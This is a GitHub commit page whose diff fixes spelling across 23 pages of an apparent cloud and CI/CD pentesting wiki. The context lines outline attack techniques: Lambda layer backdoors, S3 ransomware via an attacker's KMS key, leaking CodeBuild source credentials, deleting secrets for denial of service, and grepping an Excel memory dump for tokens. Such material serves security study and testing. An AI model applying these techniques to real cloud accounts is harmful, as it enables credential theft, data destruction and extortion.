Skip to content

Commit

Permalink
Fix typos
Browse files Browse the repository at this point in the history
  • Loading branch information
devubu committed Oct 29, 2024
1 parent 60f9b0b commit d48e238
Show file tree
Hide file tree
Showing 23 changed files with 23 additions and 23 deletions.
2 changes: 1 addition & 1 deletion pentesting-ci-cd/apache-airflow-security/README.md
Original file line number Diff line number Diff line change
Expand Up @@ -19,7 +19,7 @@ Learn & practice GCP Hacking: <img src="../../.gitbook/assets/image (2).png" alt

[**Apache Airflow**](https://airflow.apache.org) serves as a platform for **orchestrating and scheduling data pipelines or workflows**. The term "orchestration" in the context of data pipelines signifies the process of arranging, coordinating, and managing complex data workflows originating from various sources. The primary purpose of these orchestrated data pipelines is to furnish processed and consumable data sets. These data sets are extensively utilized by a myriad of applications, including but not limited to business intelligence tools, data science and machine learning models, all of which are foundational to the functioning of big data applications.

Basically, Apache Airflow will allow you to **schedule de execution of code when something** (event, cron) **happens**.
Basically, Apache Airflow will allow you to **schedule the execution of code when something** (event, cron) **happens**.

### Local Lab

Expand Down
2 changes: 1 addition & 1 deletion pentesting-ci-cd/cloudflare-security/README.md
Original file line number Diff line number Diff line change
Expand Up @@ -62,7 +62,7 @@ On each Cloudflare's worker check:
* [ ] Check the **code of the worker** and search for **vulnerabilities** (specially in places where the user can manage the input)
* Check for SSRFs returning the indicated page that you can control
* Check XSSs executing JS inside a svg image
* It is possible that the worker interacts with other internal services. For example, a worker may interact with a R2 bucket storing information in it obtained from the input. In that case, it would be necessary to check what capabilites does the worker have over the R2 bucket and how could it be abused from the user input.
* It is possible that the worker interacts with other internal services. For example, a worker may interact with a R2 bucket storing information in it obtained from the input. In that case, it would be necessary to check what capabilities does the worker have over the R2 bucket and how could it be abused from the user input.

{% hint style="warning" %}
Note that by default a **Worker is given a URL** such as `<worker-name>.<account>.workers.dev`. The user can set it to a **subdomain** but you can always access it with that **original URL** if you know it.
Expand Down
2 changes: 1 addition & 1 deletion pentesting-ci-cd/cloudflare-security/cloudflare-domains.md
Original file line number Diff line number Diff line change
Expand Up @@ -78,7 +78,7 @@ TODO

#### **CloudFlare DDoS Protection**

* If you can, enable **Bot Fight Mode** or **Super Bot Fight Mode**. If you protecting some API accessed programatically (from a JS front end page for example). You might not be able to enable this without breaking that access.
* If you can, enable **Bot Fight Mode** or **Super Bot Fight Mode**. If you protecting some API accessed programmatically (from a JS front end page for example). You might not be able to enable this without breaking that access.
* In **WAF**: You can create **rate limits by URL path** or to **verified bots** (Rate limiting rules), or to **block access** based on IP, Cookie, referrer...). So you could block requests that doesn't come from a web page or has a cookie.
* If the attack is from a **verified bot**, at least **add a rate limit** to bots.
* If the attack is to a **specific path**, as prevention mechanism, add a **rate limit** in this path.
Expand Down
Original file line number Diff line number Diff line change
Expand Up @@ -27,7 +27,7 @@ Learn & practice GCP Hacking: <img src="../../.gitbook/assets/image (2).png" alt

The ATC is the heart of Concourse. It runs the **web UI and API** and is responsible for all pipeline **scheduling**. It **connects to PostgreSQL**, which it uses to store pipeline data (including build logs).

The [checker](https://concourse-ci.org/checker.html)'s responsibility is to continously checks for new versions of resources. The [scheduler](https://concourse-ci.org/scheduler.html) is responsible for scheduling builds for a job and the [build tracker](https://concourse-ci.org/build-tracker.html) is responsible for running any scheduled builds. The [garbage collector](https://concourse-ci.org/garbage-collector.html) is the cleanup mechanism for removing any unused or outdated objects, such as containers and volumes.
The [checker](https://concourse-ci.org/checker.html)'s responsibility is to continuously checks for new versions of resources. The [scheduler](https://concourse-ci.org/scheduler.html) is responsible for scheduling builds for a job and the [build tracker](https://concourse-ci.org/build-tracker.html) is responsible for running any scheduled builds. The [garbage collector](https://concourse-ci.org/garbage-collector.html) is the cleanup mechanism for removing any unused or outdated objects, such as containers and volumes.

#### TSA: worker registration & forwarding

Expand Down
Original file line number Diff line number Diff line change
Expand Up @@ -48,7 +48,7 @@ In `/configureSecurity` it's possible to **configure the authorization method of

![](<../../.gitbook/assets/image (149).png>)

* **Project-based Matrix Authorization Strategy:** This mode is an **extension** to "**Matrix-based securit**y" that allows additional ACL matrix to be **defined for each project separately.**
* **Project-based Matrix Authorization Strategy:** This mode is an **extension** to "**Matrix-based security**" that allows additional ACL matrix to be **defined for each project separately.**
* **Role-Based Strategy:** Enables defining authorizations using a **role-based strategy**. Manage the roles in `/role-strategy`.

## **Security Realm**
Expand Down
2 changes: 1 addition & 1 deletion pentesting-ci-cd/okta-security/README.md
Original file line number Diff line number Diff line change
Expand Up @@ -43,7 +43,7 @@ There are **users** (which can be **stored in Okta,** logged from configured **I
These users can be inside **groups**.\
There are also **authenticators**: different options to authenticate like password, and several 2FA like WebAuthn, email, phone, okta verify (they could be enabled or disabled)...

Then, there are **applications** syncronized with Okta. Each applications will have some **mapping with Okta** to share information (such as email addresses, first names...). Moreover, each application must be inside an **Authentication Policy**, which indicates the **needed authenticators** for a user to **access** the application.
Then, there are **applications** synchronized with Okta. Each applications will have some **mapping with Okta** to share information (such as email addresses, first names...). Moreover, each application must be inside an **Authentication Policy**, which indicates the **needed authenticators** for a user to **access** the application.

{% hint style="danger" %}
The most powerful role is **Super Administrator**.
Expand Down
Original file line number Diff line number Diff line change
Expand Up @@ -33,7 +33,7 @@ It's possible to **introduce/backdoor a layer to execute arbitrary code** when t

### Lambda Extension Persistence

Abusing Lambda Layers it's also possible to abuse extensions and persiste in the lambda but also steal and modify requests.
Abusing Lambda Layers it's also possible to abuse extensions and persist in the lambda but also steal and modify requests.

{% content-ref url="aws-abusing-lambda-extensions.md" %}
[aws-abusing-lambda-extensions.md](aws-abusing-lambda-extensions.md)
Expand Down
Original file line number Diff line number Diff line change
Expand Up @@ -17,7 +17,7 @@ Learn & practice GCP Hacking: <img src="/.gitbook/assets/image (2).png" alt="" d

## Recover Github/Bitbucket Configured Tokens

First, check if there are any source credentials configured tha you could leak:
First, check if there are any source credentials configured that you could leak:

```bash
aws codebuild list-source-credentials
Expand Down
Original file line number Diff line number Diff line change
Expand Up @@ -38,7 +38,7 @@ In this scenario, the **attacker creates a KMS (Key Management Service) key in t

The attacker identifies a target **S3 bucket and gains write-level access** to it using various methods. This could be due to poor bucket configuration that exposes it publicly or the attacker gaining access to the AWS environment itself. The attacker typically targets buckets that contain sensitive information such as personally identifiable information (PII), protected health information (PHI), logs, backups, and more.

To determine if the bucket can be targeted for ransomware, the attacker checks its configuration. This includes verifying if **S3 Object Versionin**g is enabled and if **multi-factor authentication delete (MFA delete) is enabled**. If Object Versioning is not enabled, the attacker can proceed. If Object Versioning is enabled but MFA delete is disabled, the attacker can **disable Object Versioning**. If both Object Versioning and MFA delete are enabled, it becomes more difficult for the attacker to ransomware that specific bucket.
To determine if the bucket can be targeted for ransomware, the attacker checks its configuration. This includes verifying if **S3 Object Versioning** is enabled and if **multi-factor authentication delete (MFA delete) is enabled**. If Object Versioning is not enabled, the attacker can proceed. If Object Versioning is enabled but MFA delete is disabled, the attacker can **disable Object Versioning**. If both Object Versioning and MFA delete are enabled, it becomes more difficult for the attacker to ransomware that specific bucket.

Using the AWS API, the attacker **replaces each object in the bucket with an encrypted copy using their KMS key**. This effectively encrypts the data in the bucket, making it inaccessible without the key.

Expand Down
Original file line number Diff line number Diff line change
Expand Up @@ -52,7 +52,7 @@ aws secretsmanager update-secret \

### DoS Deleting Secret

The minimun num of days to delete a secret are 7
The minimum number of days to delete a secret are 7

```bash
aws secretsmanager delete-secret \
Expand Down
Original file line number Diff line number Diff line change
Expand Up @@ -24,7 +24,7 @@ For more information about AWS Identity Center / AWS SSO check:
{% endcontent-ref %}

{% hint style="warning" %}
Note that by **default**, only **users** with permissions **form** the **Management Account** are going to be able to access and **control de IAM Identity Center**.\
Note that by **default**, only **users** with permissions **form** the **Management Account** are going to be able to access and **control the IAM Identity Center**.\
Users from other accounts can only allow it if the account is a **Delegated Adminstrator.**\
[Check the docs for more info.](https://docs.aws.amazon.com/singlesignon/latest/userguide/delegated-admin.html)
{% endhint %}
Expand Down
Original file line number Diff line number Diff line change
Expand Up @@ -27,7 +27,7 @@ Directory Services allows to create 5 types of directories:
* **Simple AD**: Which will be a **Linux-Samba** Active Directory–compatible server. You will be able to set the admin password and access the DCs in a VPC.
* **AD Connector**: A proxy for **redirecting directory requests to your existing Microsoft Active Directory** without caching any information in the cloud. It will be listening in a **VPC** and you need to give **credentials to access the existing AD**.
* **Amazon Cognito User Pools**: This is the same as Cognito User Pools.
* **Cloud Directory**: This is the **simpest** one. A **serverless** directory where you indicate the **schema** to use and are **billed according to the usage**.
* **Cloud Directory**: This is the **simplest** one. A **serverless** directory where you indicate the **schema** to use and are **billed according to the usage**.

AWS Directory services allows to **synchronise** with your existing **on-premises** Microsoft AD, **run your own one** in AWS or synchronize with **other directory types**.

Expand Down
Original file line number Diff line number Diff line change
Expand Up @@ -40,7 +40,7 @@ In AWS Elastic Beanstalk, the concepts of an "application" and an "environment"
#### Application

* An application in Elastic Beanstalk is a **logical container for your application's source code, environments, and configurations**. It groups together different versions of your application code and allows you to manage them as a single entity.
* When you create an application, you provide a name and descriptio**n, but no resources are provisioned** at this stage. it is simply a way to organize and manage your code and related resources.
* When you create an application, you provide a name and **description, but no resources are provisioned** at this stage. it is simply a way to organize and manage your code and related resources.
* You can have **multiple application versions** within an application. Each version corresponds to a specific release of your code, which can be deployed to one or more environments.

#### Environment
Expand Down
Original file line number Diff line number Diff line change
Expand Up @@ -33,7 +33,7 @@ It's possible to **introduce/backdoor a layer to execute arbitrary code** when t

### Lambda Extension Persistence

Abusing Lambda Layers it's also possible to abuse extensions and persiste in the lambda but also steal and modify requests.
Abusing Lambda Layers it's also possible to abuse extensions and persist in the lambda but also steal and modify requests.

{% content-ref url="aws-abusing-lambda-extensions.md" %}
[aws-abusing-lambda-extensions.md](aws-abusing-lambda-extensions.md)
Expand Down
Original file line number Diff line number Diff line change
Expand Up @@ -17,7 +17,7 @@ Learn & practice GCP Hacking: <img src="../../../../.gitbook/assets/image (2).pn

## Recover Github/Bitbucket Configured Tokens

First, check if there are any source credentials configured tha you could leak:
First, check if there are any source credentials configured that you could leak:

```bash
aws codebuild list-source-credentials
Expand Down
Original file line number Diff line number Diff line change
Expand Up @@ -38,7 +38,7 @@ In this scenario, the **attacker creates a KMS (Key Management Service) key in t

The attacker identifies a target **S3 bucket and gains write-level access** to it using various methods. This could be due to poor bucket configuration that exposes it publicly or the attacker gaining access to the AWS environment itself. The attacker typically targets buckets that contain sensitive information such as personally identifiable information (PII), protected health information (PHI), logs, backups, and more.

To determine if the bucket can be targeted for ransomware, the attacker checks its configuration. This includes verifying if **S3 Object Versionin**g is enabled and if **multi-factor authentication delete (MFA delete) is enabled**. If Object Versioning is not enabled, the attacker can proceed. If Object Versioning is enabled but MFA delete is disabled, the attacker can **disable Object Versioning**. If both Object Versioning and MFA delete are enabled, it becomes more difficult for the attacker to ransomware that specific bucket.
To determine if the bucket can be targeted for ransomware, the attacker checks its configuration. This includes verifying if **S3 Object Versioning** is enabled and if **multi-factor authentication delete (MFA delete) is enabled**. If Object Versioning is not enabled, the attacker can proceed. If Object Versioning is enabled but MFA delete is disabled, the attacker can **disable Object Versioning**. If both Object Versioning and MFA delete are enabled, it becomes more difficult for the attacker to ransomware that specific bucket.

Using the AWS API, the attacker **replaces each object in the bucket with an encrypted copy using their KMS key**. This effectively encrypts the data in the bucket, making it inaccessible without the key.

Expand Down
Original file line number Diff line number Diff line change
Expand Up @@ -52,7 +52,7 @@ aws secretsmanager update-secret \

### DoS Deleting Secret

The minimun num of days to delete a secret are 7
The minimum number of days to delete a secret are 7

```bash
aws secretsmanager delete-secret \
Expand Down
Original file line number Diff line number Diff line change
Expand Up @@ -24,7 +24,7 @@ For more information about AWS Identity Center / AWS SSO check:
{% endcontent-ref %}

{% hint style="warning" %}
Note that by **default**, only **users** with permissions **form** the **Management Account** are going to be able to access and **control de IAM Identity Center**.\
Note that by **default**, only **users** with permissions **form** the **Management Account** are going to be able to access and **control the IAM Identity Center**.\
Users from other accounts can only allow it if the account is a **Delegated Adminstrator.**\
[Check the docs for more info.](https://docs.aws.amazon.com/singlesignon/latest/userguide/delegated-admin.html)
{% endhint %}
Expand Down
Original file line number Diff line number Diff line change
Expand Up @@ -27,7 +27,7 @@ Directory Services allows to create 5 types of directories:
* **Simple AD**: Which will be a **Linux-Samba** Active Directory–compatible server. You will be able to set the admin password and access the DCs in a VPC.
* **AD Connector**: A proxy for **redirecting directory requests to your existing Microsoft Active Directory** without caching any information in the cloud. It will be listening in a **VPC** and you need to give **credentials to access the existing AD**.
* **Amazon Cognito User Pools**: This is the same as Cognito User Pools.
* **Cloud Directory**: This is the **simpest** one. A **serverless** directory where you indicate the **schema** to use and are **billed according to the usage**.
* **Cloud Directory**: This is the **simplest** one. A **serverless** directory where you indicate the **schema** to use and are **billed according to the usage**.

AWS Directory services allows to **synchronise** with your existing **on-premises** Microsoft AD, **run your own one** in AWS or synchronize with **other directory types**.

Expand Down
Original file line number Diff line number Diff line change
Expand Up @@ -40,7 +40,7 @@ In AWS Elastic Beanstalk, the concepts of an "application" and an "environment"
#### Application

* An application in Elastic Beanstalk is a **logical container for your application's source code, environments, and configurations**. It groups together different versions of your application code and allows you to manage them as a single entity.
* When you create an application, you provide a name and descriptio**n, but no resources are provisioned** at this stage. it is simply a way to organize and manage your code and related resources.
* When you create an application, you provide a name and **description, but no resources are provisioned** at this stage. it is simply a way to organize and manage your code and related resources.
* You can have **multiple application versions** within an application. Each version corresponds to a specific release of your code, which can be deployed to one or more environments.

#### Environment
Expand Down
2 changes: 1 addition & 1 deletion pentesting-cloud/aws-security/aws-services/aws-iam-enum.md
Original file line number Diff line number Diff line change
Expand Up @@ -420,7 +420,7 @@ aws identitystore create-user --identity-store-id <store-id> --user-name privesc

* Create a group and assign it permissions and set on it a controlled user
* Give extra permissions to a controlled user or group
* By default, only users with permissions form the Management Account are going to be able to access and control de IAM Identity Center.
* By default, only users with permissions form the Management Account are going to be able to access and control the IAM Identity Center.

However, it's possible via Delegate Administrator to allow users from a different account to manage it. They won't have exactly the same permission, but they will be able to perform [**management activities**](https://docs.aws.amazon.com/singlesignon/latest/userguide/delegated-admin.html).

Expand Down
Original file line number Diff line number Diff line change
Expand Up @@ -21,7 +21,7 @@ As explained in [**this video**](https://www.youtube.com/watch?v=OHKZkXC4Duw), s

Steps:

1. Dump the excel processes syncronized with in EntraID user with your favourite tool.
1. Dump the excel processes synchronized with in EntraID user with your favourite tool.
2. Run: `string excel.dmp | grep 'eyJ0'` and find several tokens in the output
3. Find the tokens that interest you the most and run tools over them:

Expand Down
Original file line number Diff line number Diff line change
Expand Up @@ -23,7 +23,7 @@ Learn & practice GCP Hacking: <img src="../../../../.gitbook/assets/image (2).pn

It's the **most common method** used by companies to synchronize an on-prem AD with Azure AD.

All **users** and a **hash of the password hashes** are syncronized from the on-prem to Azure AD. However, **clear-text passwords** or the **original** **hashes** aren't sent to Azure AD.\
All **users** and a **hash of the password hashes** are synchronized from the on-prem to Azure AD. However, **clear-text passwords** or the **original** **hashes** aren't sent to Azure AD.\
Moreover, **Built-in** security groups (like domain admins...) are **not synced** to Azure AD.

The **hashes syncronization** occurs every **2 minutes**. However, by default, **password expiry** and **account** **expiry** are **not sync** in Azure AD. So, a user whose **on-prem password is expired** (not changed) can continue to **access Azure resources** using the old password.
Expand Down

0 comments on commit d48e238

Please sign in to comment.